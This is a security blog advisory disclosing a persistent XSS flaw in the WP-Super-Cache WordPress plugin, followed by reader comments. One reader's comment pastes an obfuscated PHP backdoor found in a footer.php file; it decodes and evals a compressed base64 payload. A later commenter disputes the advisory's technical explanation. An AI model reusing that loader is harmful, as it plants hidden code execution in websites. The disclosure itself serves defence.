• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Security Advisory: Persistent XSS in WP-Super-Cache

April 7, 2015Marc-Alexandre Montpas

Security Risk: Dangerous

Exploitation Level: Very Easy/Remote

DREAD Score: 8/10

Vulnerability: Persistent XSS

Patched Version: 1.4.4

FacebookTwitterSubscribe

During a routine audit for our Website Firewall (WAF), we discovered a dangerous persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to WordPress.org). The security issue, as well as another bug-fix that was included in the issue’s original patch, are fixed in version 1.4.4.

What Are the Risks?

Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts to the plugin’s cached file listing page. This page requires a valid nonce in order to be displayed, so a successful exploitation would require the site’s administrator to have a look at that particular section, manually.

When executed, the injected scripts could be used to perform a lot of other things like adding a new administrator account to the site, injecting backdoors by using WordPress theme edition tools, etc.

Technical Details

The issue lies in the way WP-Super-Cache would display information stored in cache file’s key, which is used by the plugin to decide what cache file must be loaded.

WP Super Cache Details Key

As you can see from the above, the $details[ ‘key’ ] is directly appended to the page’s content, without being sanitized first – $details[ ‘uri’ ] is sanitized somewhere else, before this snippet.

WP Super Cache Key Index

As the key index of the $details variable contains the get_wp_cache_key() function’s return (which contains data coming straight from the user’s cookies), an attacker can insert malicious scripts on the page.

Update as Soon as Possible

Again, if you’re using a vulnerable version of this plugin, update as soon as possible! In the event where you can not do this, we strongly recommend leveraging our Website Firewall to get it patched virtually.
FacebookTwitterSubscribe

Categories: Ecommerce Security, Security Advisory, Vulnerability Disclosure, WordPress SecurityTags: WordPress Plugins and Themes, XSS

About Marc-Alexandre Montpas

Marc-Alexandre Montpas is Sucuri’s Senior Security Analyst who joined the company in 2014. Marc’s main responsibilities include reversing security patches and scavenging vulnerabilities, old and new. His professional experience covers eight years of finding bugs in open-source software. When Marc isn’t breaking things, you might find him participating in a hacking CTF competition. Connect with him on Twitter.

Reader Interactions

Comments

  1. Daniel

    April 7, 2015

    is there poc available?

  2. Thomas Zickell

    April 7, 2015

    Nice catch guys!
    That is definitely one of the most recommended plug-ins in addition to over 1 million installs this is a big deal. It is critical that people install a true method of protecting their sites as no one knows when they’re going to need their firewall they should rest easy knowing that it is there to protect them. When they do need it.

    Tom

  3. eUKhost-Web Hosting Since 2001

    April 8, 2015

    This is one of the widely used WordPress plugin to improve blog performance. Thank you very much for sharing quick details.

  4. Drew Malaki

    April 8, 2015

    Thank you for sharing this. Need to warn all my friends using this plugin.. Hope they will have a update as soon as possible.

  5. sj e-biznes

    April 8, 2015

    Ohh it’s good to know guys. I needed to check this out but it has tourned out that i have changed my plugin to WP Fastest few weeks ago. However thanks beacause when i was there i have made some plugins updates 🙂

  6. Chris (Krzysztof) Trynkiewicz

    April 8, 2015

    Actually, it was fixed in 1.4.3 according to the update log. But thanks for responsibly disclosing this! I hope the Sucuri team gets a lot of clients, which you deserve. Keep up the good work!

  7. Mike

    April 9, 2015

    I’ve noticed on a site that I had been monitoring. It’s never once had wp-cache installed. I was looking through the footer.php because i noticed my footers disappeared, i came across this. Any idea what could have made this?

    <?php /* */$WPCACHE0 = “ih2*t4krc.og0/5(a_szl);1pqex6739vdnjbfm8uwy”;

    $WPCACHE3 = $WPCACHE0[24].$WPCACHE0[7].$WPCACHE0[26].$WPCACHE0[11].$WPCACHE0[17].$WPCACHE0[7].$WPCACHE0[26].$WPCACHE0[24].$WPCACHE0[20].$WPCACHE0[16].$WPCACHE0[8].$WPCACHE0[26];

    $WPCACHE2 = “x65va”.chr(108).”x28g”.chr(122).””.chr(105).””.chr(110).”x66x6cx61″.chr(116).”e(“.chr(98).”a”.chr(115).”x65x36″.chr(52).”_”.chr(100).””.chr(101).”x63ox64x65(“;$WPCACHE1 = “)”.chr(41).””.chr(41).”x3B”;$giq8327 = $WPCACHE2.”‘bY9tS8MwFIX/ipSytlD7Zj84S5EiQYU5Z1/8IiPU67UN1iS0KQ7E/266DlQcgST3nnOe5L6OHBQT/KSmtgnU+TQhSGHsO8o4U7aT7O8DKiGVNgRuHLnB/264XIZnbnhECIIgcifyMSk8d43V/VW2KrINMZzEhHB+HHcIk+mQgk4MONc9qrHn2ph8mRCl+ttGq5S88P0PCTW0ePrciabB3gPx7jeoOsbfBk+28rKWDMQLpl09rTheyLpBjU8NT+/IJ9G2DjTLM2lB8keSP1nzSdfZHbG2v/o5eahIUdIqv7W2jmcsxgF7zeTqD/IncFOWG1rpimbXZF3uQ3pshFboYRLcMZV8Aw=='”.$WPCACHE1;

    $WPCACHE3($WPCACHE0[13].$WPCACHE0[9].$WPCACHE0[3].$WPCACHE0[13].$WPCACHE0[26], $giq8327 ,”594″);/* */ ?>

  8. Cary Cook

    April 9, 2015

    How do I know if my site uses WordPress?

  9. Madking Web Design

    April 9, 2015

    maybe you’ve tryed to install the plugin at once, and if you install and activate it, after if you erase the plugin, it leaves some code inside your wordpress web site. you should enter your web site through ftp, find the code, keep a back up and after erase the code tha you dont need.

  10. Santrix

    April 15, 2015

    Hmmm… blocking XSS using regex in your WAF?

  11. Kim Hawkins

    April 22, 2015

    I deactivated and then activated all of my plugins on 4/17/15; I should be okay, right?

    • Paul Baron

      May 27, 2015

      No Kim, you need to backup and update, turning off and on won’t do anything to protect you. It’s best to backup your site files and database before updating in case an update screws your WP install up.

  12. mike

    September 21, 2015

    Even if you delete it, check your htaccess. I had a bunch of spam words injected and had to manually clean it out. It was this plugin.

  13. benhayak

    May 19, 2016

    Sorry to blow it but the analysis is incorrect
    Tried to reproduce but it seems you missed esc_html over the cookie,

    wp-cache v.1.4.4:
    //The get_wp_cache_cookie saves the cookie to file in the meta folder, then when the //Settings page pulls the data from the file and sanitize it before displaying

    $meta = unserialize( file_get_contents( $blog_cache_dir . ‘meta/’ . $file ) ); //dangerous byitself
    [..snip..]

    foreach( $meta as $key => $val )
    $meta[ $key ] = esc_html( $val ); //see??

    That means it will sanitize everything that was saved, including $meta[‘key’] which is later on injected into the parameter html but sanitized….

    Do you know what the real XSS was?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.